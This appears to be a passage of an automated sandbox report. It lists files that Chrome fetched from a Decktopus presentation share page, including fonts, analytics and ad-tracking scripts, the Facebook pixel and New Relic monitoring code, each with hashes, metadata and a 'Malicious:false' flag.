                                                                                                          Preview:function _createForOfIteratorHelper(b,t){var e="undefined"!=typeof Symbol&&b[Symbol.iterator]||b["@@iterator"];if(!e){if(Array.isArray(b)||(e=_unsupportedIterableToArray(b))||t&&b&&"number"==typeof b.length){e&&(b=e);var c=0,m=function b(){};return{s:m,n:function t(){return c>=b.length?{done:!0}:{done:!1,value:b[c++]}},e:function b(t){throw t},f:m}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}var W=!0,d=!1,n;return{s:function t(){e=e.call(b)},n:function b(){var t=e.next();return W=t.done,t},e:function b(t){d=!0,n=t},f:function b(){try{W||null==e.return||e.return()}finally{if(d)throw n}}}}function _unsupportedIterableToArray(b,t){if(b){if("string"==typeof b)return _arrayLikeToArray(b,t);var e=Object.prototype.toString.call(b).slice(8,-1);return"Object"===e&&b.constructor&&(e=b.constructor.name),"Map"===e||"Set"===e?Array.from(b):"Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamp
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 20904, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):20904
                                                                                                          Entropy (8bit):7.989703931752267
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:D459699D69AF3B24388D694EB4239795
                                                                                                          SHA1:5AEC299F605D69A73B63BBEDF9167393F3927085
                                                                                                          SHA-256:73D2E6AAAE336FAB2355978D228DC8B5BB32046023488290EE0559FD67AAB113
                                                                                                          SHA-512:9EE3DC83F5EECDA2F345076E3AEE798A3420F6D68E400950D478AF0E2B4E72997777C64687DF4ECB6840A5D6F4E7117C32D4392357A25007AC5024CEE6C89677
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://app.decktopus.com/static/media/Sailec-Medium.d5050408323b1d11f631.woff2
                                                                                                          Preview:wOF2......Q...........QF........................?FFTM..B..4....`..&.....d..9..l..6.$..T. ..S....D.5xn.w..@...%X0........42.l.....#...HNd.m.>...T.T.....:i.ZX.FGA..7$&...,....p....Wa.~.d....+s....g%....U..r.o~....n..?.;.f"..7X2x....?...6.'9y.'......./..E&2+..[PuJ.U\..,....<..)R.....J!.:o.q;...g.!.[7"'" .(bP......Q1..1*..*%ZR.UR...SyP).........sf.}.D......$......e....&I.......`..P../p......1..U}........W......L..9r....6...Y....#.W......n.G...V...:.z......:<e......u.E$.T.(.B....,S.]w.Ch.7.&.5..<..w'..........].......P`.*..P3.U.c..Z....}.E.....'E..>=O1.70r......tF...6.e...d@....L.4;.9V....c. ............]..Y-...(8..S]....VK20....A../. !...B.._..Y..A.;.....Z...Q..^.x.......OU..D.R..U.w...Md#.._.c?...O...5..h3d..i......l...oS]...(...M....,_w....rO..9+.$.,3..l. ..@..<.....:%[....f*1T...~.|.V.;.h.JH$.g......] F..^E..Cl+&....uo.[K...B:.!.P...Qw.M...3..E...5.g..w....ym......@...2...N_.........1`...QA.$,a....$..G.....^>...............].q.........$.....@
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2683), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2683
                                                                                                          Entropy (8bit):5.862373516520511
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:019873A20A3BAEC39A110DEEB8930E44
                                                                                                          SHA1:F6BF93A62DBAE29CFFE311EA4F982B02BC27681E
                                                                                                          SHA-256:147A80A971F8F3374E5D16FD0CFF1E0DF1EFFE8C94BB3041562DCEFF0C9B3F41
                                                                                                          SHA-512:E7EA4037E62FE6C12694A67E6130C42666BE56597249F2CA4DF55CD3EF8B3E6E6EAA4B29C74EAF1482E514B3D593CD5A2B2A3EFD8F5FF2BE450ECE564B25B858
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:(function(){var s = {};(function(){var e={};/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ var f=this||self;var g,k;a:{for(var l=["CLOSURE_FLAGS"],p=f,q=0;q<l.length;q++)if(p=p[l[q]],p==null){k=null;break a}k=p}var r=k&&k[610401301];g=r!=null?r:!1;var t,v=f.navigator;t=v?v.userAgentData||null:null;function w(d){return g?t?t.brands.some(function(a){return(a=a.brand)&&a.indexOf(d)!=-1}):!1:!1}function x(d){var a;a:{if(a=f.navigator)if(a=a.userAgent)break a;a=""}return a.indexOf(d)!=-1};function y(){return g?!!t&&t.brands.length>0:!1}function z(){return y()?w("Chromium"):(x("Chrome")||x("CriOS"))&&!(y()?0:x("Edge"))||x("Silk")};!x("Android")||z();z();!x("Safari")||z()||(y()?0:x("Coast"))||(y()?0:x("Opera"))||(y()?0:x("Edge"))||(y()?w("Microsoft Edge"):x("Edg/"))||y()&&w("Opera");var A=/#|$/;function B(d){var a=d.search(A),b;a:{for(b=0;(b=d.indexOf("fmt",b))>=0&&b<a;){var c=d.charCodeAt(b-1);if(c==38||c==63)if(c=d.charCodeAt(b+3),!c||c==61||c==38||c==35)b
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (41169)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):41172
                                                                                                          Entropy (8bit):5.505998162296305
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:0AA5002702487976D570A640C408EBA5
                                                                                                          SHA1:48930F22A2396DF313CCDFCB91CAC20E38F2B06B
                                                                                                          SHA-256:4E8276AEA0A3C7FE3600E6718C7F484D49C347C8D5763D89BE95900D526A14DA
                                                                                                          SHA-512:37A9D609DB21EE1E696CB437C02F0F6410925EB10B6353C0CDF95DB265E342F0BC3D2AE1851D209E4517D978B7CCBE8AD56F98247FA865AE405FAFD4D2E62CDA
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):28
                                                                                                          Entropy (8bit):3.950212064914748
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:C3F64CB2A8B00CBBC30CE2908208A29D
                                                                                                          SHA1:E4AA7CAB67F4CF5FA52371DDC25A75AAFD4D0CCC
                                                                                                          SHA-256:391601283994BCD9486160BF8A5637410D280E1BDDD3AEF5428454976E193E81
                                                                                                          SHA-512:6CCBC26128FE65D6D313B965DA3D2E201D506442D0036404ABB490BE0FC99B3A0FDB611269B932DBA7F3A621E11F79ED213D2B11D487EE39C54A17D97A823552
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwleFumv8OYNGhIFDZFhlU4SBQ2RYZVO?alt=proto
                                                                                                          Preview:ChIKBw2RYZVOGgAKBw2RYZVOGgA=
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):93
                                                                                                          Entropy (8bit):4.98251197271547
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:B323A37E0BBEBA323DF70BAE3352BDE6
                                                                                                          SHA1:5C19F70140ADE033E236E8545E6EE2B5AB4490A1
                                                                                                          SHA-256:4EF904CD218FEE4FE77B22CBBBF29BBB0F672951E6A57318563F01800BBBDC7C
                                                                                                          SHA-512:6ECDAC14AE5E7B6CCFE0CEBCFA52C1BF970E7FC065EC60F54BB4CFE150356F626958B25001D9358348A09E92AF7DC13C9983E5A0E079F176555F712BBBA96405
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:{"code":404,"data":null,"message":"GET /api/public/decks/4156935/visit - API path not found"}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (34229)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):363964
                                                                                                          Entropy (8bit):5.554424595573357
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:B72A4932D51D7CDC29D7216EE63F4BB1
                                                                                                          SHA1:3CB9604438DCCAD9255A95F756ACCFD5958BC1A4
                                                                                                          SHA-256:76EFD4291167EFEBE864E7C2C7EECE7E2FB1B6F728EA696B8EF61207F8655226
                                                                                                          SHA-512:0FDD3B9EC30F77FC1FAFF0FCB0A67D0C12C8A74C4B8F6076C0ED8B1B891BA9DDA67D6B837068A727B2B45F57D1D6EBF943138944F360E9964087C2331213BE51
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=GTM-T26G8Z8
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"119",. . "macros":[{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-150754925-2","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (4179)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):272475
                                                                                                          Entropy (8bit):5.542548651002845
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:47886731BDE004B8A56678A3C6A90480
                                                                                                          SHA1:AC21BC7A32633DAF9E8882A066505FDEEB1802B7
                                                                                                          SHA-256:5427907B15C574516899325782F23F15B83DDB88C6E56726BB38FAF643DE7CCF
                                                                                                          SHA-512:45C59AE104F7E6877BD50AC0FF1F398FAD8CD56E022992E48C4D43439CBC3208F0B177AA3A5D3B461C0296126312C985BE14FA57F1E2E77FD0B059B15D4F84F0
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-10970373263","tag_id":10},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_autoEmailEnabled":true,"vtp_autoPhoneEnabled":false,"vtp_autoAddressEnabled":false,"vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":4},{"function":"__ccd_ads_first","priority":5,"vtp_instanceDestinationId":"AW-10970373263","tag_id":11},{"function":"__ccd_pre_auto_pii","priority":3,"vtp_instanceDestinationId":"AW-10970373263","tag_id":9},{"function":"__ccd_em_form","priority":2,"vtp_includeParams":false,"vtp_instanceDestinationId":"AW-10970373263","tag_id":8},{"function":"__ccd_add_1p_data","priority":1,"vtp_acceptAutomatic":true,"vtp_acceptCode":true,"vtp_accep
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (29927)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):46356
                                                                                                          Entropy (8bit):5.715848693719105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:26937B8944F2A0AD955EB877FD3F4658
                                                                                                          SHA1:B314452588251833A603EF0AC149C106E1A6B88B
                                                                                                          SHA-256:FDEEC84DA6D9A4FF1BE1B5A3AEF1DA41CD4EAB880A0FBA7DC5642E2079E98D08
                                                                                                          SHA-512:E8FE082D5C3F0ABC2B97FBD838B277341A182B7332EE469F197F2AB0B1D3EAEA41B759138A49D5B8CCF0ACD8BF96AD6963B2A288FE0C70626A08FC9886A9CBCF
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://app.decktopus.com/static/css/main.575a8867.css
                                                                                                          Preview:@font-face{font-display:swap;font-family:Sailec;font-style:normal;font-weight:400;src:url(/static/media/Sailec-Regular.f1c6405690ce1bea4f16.eot);src:url(/static/media/Sailec-Regular.f1c6405690ce1bea4f16.eot?#iefix) format("embedded-opentype"),url(/static/media/Sailec-Regular.307c4fb7f8da8e0a7fa0.woff2) format("woff2"),url(/static/media/Sailec-Regular.a0bdafa57998d73c7d6e.woff) format("woff"),url(/static/media/Sailec-Regular.37467428d43bff93e523.ttf) format("truetype"),url(/static/media/Sailec-Regular.49e949119dc6c86aafa5.svg#Sailec-Regular) format("svg")}@font-face{font-display:swap;font-family:Sailec;font-style:italic;font-weight:400;src:url(/static/media/Sailec-RegularItalic.30c88c94ee922ebe167b.eot);src:url(/static/media/Sailec-RegularItalic.30c88c94ee922ebe167b.eot?#iefix) format("embedded-opentype"),url(/static/media/Sailec-RegularItalic.8cdfafe3ce888938e8e5.woff2) format("woff2"),url(/static/media/Sailec-RegularItalic.4c39f2a667792780fd20.woff) format("woff"),url(/static/media/Sa
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (4775), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):4775
                                                                                                          Entropy (8bit):5.814487297359699
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:BD3112FF395A6ABFE8CA300691BC0674
                                                                                                          SHA1:F162AD130F873B1133C7C382B435EC877625740E
                                                                                                          SHA-256:85BAA2B3992E87B6D4747EF6EF864073C7B524DB25EC6F91DA18BC84426739D0
                                                                                                          SHA-512:9C1D366F195C6C2320AC7DFA37120D9256F89E4A682D592450C49228B283B5EEC33C911F37FB51D9C7D7F70E6AE65A59EE56E1CC6705ACB63268597CED004775
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/10970373263/?random=1724683725461&cv=11&fst=1724683725461&bg=ffffff&guid=ON&async=1&gtm=45be48l0v893181767z8830215601za201zb830215601&gcd=13l3l3l3l1l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fapp.decktopus.com%2Fshare%2FMUYKd1%2F1&hn=www.googleadservices.com&frm=0&tiba=Decktopus%20%7C%20Create%20Better%20Presentations%20%7C%20AI%20Presentation%20Assistant&npa=0&pscdl=noapi&auid=1984128038.1724683723&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=4
                                                                                                          Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with very long lines (2394), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2394
                                                                                                          Entropy (8bit):5.763067794457878
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:B84429BBB03DD22CB1FD596D8A10FBC6
                                                                                                          SHA1:8756DC9656C7221BC9EEB77562B5EB196D42E1E3
                                                                                                          SHA-256:C70E0C982519F3A18EC92274480A52BF8B6B45C28D04A08D46046CAF982FF689
                                                                                                          SHA-512:93249AD86EE72EC7C376760670AA69D8D3AFD31FDF34381772E93212DD44EA1BFA79C872D956B1744CC88AB32FEB51761F264990C15D8FBBB12007D3AEC2A821
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://td.doubleclick.net/td/rul/10970373263?random=1724683725461&cv=11&fst=1724683725461&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be48l0v893181767z8830215601za201zb830215601&gcd=13l3l3l3l1l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fapp.decktopus.com%2Fshare%2FMUYKd1%2F1&hn=www.googleadservices.com&frm=0&tiba=Decktopus%20%7C%20Create%20Better%20Presentations%20%7C%20AI%20Presentation%20Assistant&npa=0&pscdl=noapi&auid=1984128038.1724683723&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1
                                                                                                          Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":2592000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s1984128038.1724683723","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s1984128038.1724683723","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1sdwz6nQ!2sZvQizw!3sAAptDV5tzpF1"],"userBiddingSignals":[["7336096761","7348647275"],null,1724683727243422],"ads":[{"renderUrl":"https://tdsf.doubleclick.net/td/adfetch/gda?adg_id=161030276560\u0026cr_id=697956524058\u0026cv_id=0\u0026format=${AD_WIDTH}x${AD_HEIGHT}\u002
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (27137)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):348847
                                                                                                          Entropy (8bit):5.576122446397449
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:8E328B882D91BF11002F638479ED98BF
                                                                                                          SHA1:9C7BD59363585DCC66527A2F338F186255698759
                                                                                                          SHA-256:9C0237463A78FA8B7D76B608FFFB09DAB792C6F09BA3B3439944515A45DAD2F1
                                                                                                          SHA-512:692E59978C46F805E57B047BE3FCEA96DCF00DBF445D3456A85518D85A5B8E79CDDDEFBA1B1BBF278942F7E25FFF5C8A14CE02271ABD95D290E6E8B5CD10F66B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=G-RDRSM8WPZJ&l=dataLayer&cx=c
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"6",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":55,"vtp_rules":["list","decktopus\\.com"],"tag_id":15},{"function":"__ogt_ga_datatos","priority":55,"vtp_instanceDestinationId":"G-RDRSM8WPZJ","tag_id":60},{"function":"__ogt_referral_exclusion","priority":45,"vtp_includeConditions":["list","^accounts\\.google\\.com$","checkout\\.stripe\\.com"],"tag_id":11},{"function":"__ogt_ga_send","priority":45,"vtp_value":true,"tag_id":13},{"function":"__ogt_session_timeout","priority":45,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":14},{"function":"__ogt_1p_data_v2","priority":45,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstName
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (27137)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):348847
                                                                                                          Entropy (8bit):5.576119134096009
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:CB5A7C43893B10E8A94E9F569249CBCF
                                                                                                          SHA1:E8A19C55C10EEEB1C8403FCF263DE6B69BF62C36
                                                                                                          SHA-256:CC52A4F2CE8A6FDCAAB6710D466E883153638E318D03B97F2844C4095E0CA13E
                                                                                                          SHA-512:28A265AB600C0B236C49A05E54B9E566255B48F3F236E904D06FBACA71046FD68DDC8E6C5BD498BBED6BF6A874EC496E0D195B14BFBEBEE6EE2AE2524C4EFE37
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"6",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":55,"vtp_rules":["list","decktopus\\.com"],"tag_id":15},{"function":"__ogt_ga_datatos","priority":55,"vtp_instanceDestinationId":"G-RDRSM8WPZJ","tag_id":60},{"function":"__ogt_referral_exclusion","priority":45,"vtp_includeConditions":["list","^accounts\\.google\\.com$","checkout\\.stripe\\.com"],"tag_id":11},{"function":"__ogt_ga_send","priority":45,"vtp_value":true,"tag_id":13},{"function":"__ogt_session_timeout","priority":45,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":14},{"function":"__ogt_1p_data_v2","priority":45,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstName
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (5552)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):75003
                                                                                                          Entropy (8bit):5.331498942212463
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:B93BB93D3FBC0D21216720586736E926
                                                                                                          SHA1:D725564A69B9D85A769D09073FD6EE79A33071D7
                                                                                                          SHA-256:7783F4200BE60E5CDB2FCE2AAF70DC6480EF5AB843AA88372C18718EFE26BF54
                                                                                                          SHA-512:88318A946C00661D0D88E8B22062C58E5E34EA5C594815084384DDB80F81FB58A11AE3009B07FA6103ED99ADA63401AD33235F233D5DB46A3C15C76CBB38554C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://connect.facebook.net/signals/config/934841733790287?v=2.9.165&r=stable&domain=app.decktopus.com&hme=da9a399065fb1c492026018b9e54864148adfb49d800f41752428fb7b59190f8&ex_m=69%2C118%2C104%2C108%2C60%2C4%2C97%2C68%2C16%2C94%2C86%2C50%2C53%2C168%2C171%2C183%2C179%2C180%2C182%2C29%2C98%2C52%2C75%2C181%2C163%2C166%2C176%2C177%2C184%2C127%2C40%2C34%2C139%2C15%2C49%2C190%2C189%2C129%2C18%2C39%2C1%2C42%2C64%2C65%2C66%2C70%2C90%2C17%2C14%2C93%2C89%2C88%2C105%2C51%2C107%2C38%2C106%2C30%2C91%2C26%2C164%2C167%2C136%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C56%2C61%2C63%2C73%2C99%2C27%2C74%2C9%2C8%2C78%2C47%2C21%2C101%2C100%2C102%2C95%2C10%2C20%2C3%2C19%2C83%2C55%2C81%2C33%2C72%2C0%2C92%2C32%2C80%2C85%2C46%2C45%2C84%2C37%2C5%2C87%2C79%2C43%2C35%2C82%2C2%2C36%2C62%2C41%2C103%2C44%2C77%2C67%2C109%2C59%2C58%2C31%2C96%2C57%2C54%2C48%2C76%2C71%2C24%2C110
                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (55466)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):55982
                                                                                                          Entropy (8bit):5.356485260151869
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:EC770AE06E31DEDFD2C6AFB1C2E2D85F
                                                                                                          SHA1:D327CF6FEF433839D7AF9B7D3204D279404167E7
                                                                                                          SHA-256:055F91FE7B5AB083756BFD27A1859E9E00781737BF5C9DD5A8F09F83781681D2
                                                                                                          SHA-512:5F00DBAE009A99000FCAC9480CAB2E13BFA0BA0F17A782D117126BB46962CEC4DDB73F3502774CDF5FAAA00B54DEB3409073495308BF11D9AEE6F826FB9683F8
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://app.decktopus.com/nr.js
                                                                                                          Preview:if (env.NR_APPID) {..;window.NREUM||(NREUM={});NREUM.init={distributed_tracing:{enabled:true},privacy:{cookies_enabled:true},ajax:{deny_list:["bam.nr-data.net"]}};..;NREUM.loader_config={accountID:"4220971",trustKey:"4220971",agentID:env.NR_APPID,licenseKey:env.NR_LICENCE,applicationID:env.NR_APPID};.;NREUM.info={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",licenseKey:env.NR_LICENCE,applicationID:env.NR_APPID,sa:1};.;/*! For license information please see nr-loader-spa-1.250.0.min.js.LICENSE.txt */.(()=>{var e,t,r={234:(e,t,r)=>{"use strict";r.d(t,{P_:()=>m,Mt:()=>b,C5:()=>s,DL:()=>A,OP:()=>D,lF:()=>O,Yu:()=>E,Dg:()=>v,CX:()=>c,GE:()=>x,sU:()=>N});var n=r(8632),i=r(9567);const o={beacon:n.ce.beacon,errorBeacon:n.ce.errorBeacon,licenseKey:void 0,applicationID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},a={
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (9189)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):230446
